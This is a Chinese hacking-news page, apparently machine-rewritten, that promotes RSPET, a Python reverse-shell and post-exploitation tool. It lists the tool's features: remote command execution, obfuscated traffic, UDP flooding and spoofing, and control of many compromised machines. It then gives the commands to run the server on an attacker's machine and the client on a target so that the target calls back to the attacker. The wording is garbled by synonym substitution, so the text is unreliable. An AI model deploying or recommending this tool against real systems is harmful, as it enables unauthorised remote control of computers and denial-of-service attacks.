基于Python的反连Shell和后渗透工具

基于Python的反连Shell和后渗透工具

黑客软件hacker2019-07-11 20:20:0210212A+A-

基于Python的反连Shell和后渗透工具 第1张

"声明函:此软件供培训探讨使用或作为一个POC。开发人员不赞成和激励或者用任何方法支持非受权的电脑上侵入和网络损坏。

RSPET (Reverse Shell when Post Exploitation Tool) 是一个来源于PHP的反连shell,而且享有后渗入阶段的一些功能。

注意:在V0.0.3版本号中加上了一个mln文件夹名称,因为这个最新版本含有了任何不影响主功能(反连shell)的任何功能,mln不会加入v0.0.3之后版本号的所有更智能,只接受与Bug和性能有关的补订。

目前的版本号:v0.0.6

功能

远程命令实行

总流量加锁(异或加锁充当加密算法传输数据),使用443端口号可以得到更好的效果【1】

内嵌了加密传输文档或二进制数据的功能

内嵌UDP洪泛进攻工具

内嵌UDP蒙骗进攻工具【2】

管理多个或所有服务器,控制多个接入的服务器传输数据文档和UDP洪泛进攻。

模块化设计的代码设计,便于订制【3】

手机客户端脚本已经过检测,可以兼容模式Pyinstaller(可以转化成.exe)【4】

【1】异或加锁和手机客户端构架的设计灵感来自primalsecurity.net,如果最喜欢这个工具,你可能也喜欢他们做的任何物品。

【2】UDP蒙骗使用了RAW_SOCKETS,所以为了正常使用,手机客户端需要运作在支持RAW_SOCKETS的系统软件(绝大多数来源于Unix的系统)上,而且有root管理权限。最后,很多ISP在某地点做过手和脚,有可能会丢掉或者改动蒙骗的数据文件。

【3】查询EXPANDING,方便你加上新的功能,或者根据你的需要订制RSPET

【4】查询primalsecurity.net的搏客,了解添加.exe的方法

布署

RSPET_server.py或RSPET_server_mln.py运作在攻击机上,接受接入。

RSPET_client.py或RSPET_client_mln.py运作在目标机里,会复位并发送到接入恳求,等待时间键入。

实行

服务器端:

python RSPET_server.py (max_connections) 

max_connections如果为空,则默认设置为5.

控制端:

python RSPET_client.py server_ip

可以根据本人需要进行调整

Linux发行版

含有RSPET的Linux发行版目录

BlackArch Linux (2016.04.28版本号中)"


点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 2条评论
  • 萌懂鱼芗2022-05-28 14:45:17
  • T【4】查询primalsecurity.net的搏客,了解添加.exe的方法布署RSPET_server.py或RSPET_server_mln.py运作在攻击机上,接受接入。RSPET_client.py或RSPET_cli
  • 痴者珞棠2022-05-28 12:59:27
  • RSPET_server.py或RSPET_server_mln.py运作在攻击机上,接受接入。RSPET_client.py或RSPET_client_mln.py运作在目标机里,会复位并发送到接入恳求,等待时间键入。实行服务器端:python RSPET_server.py (max_

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理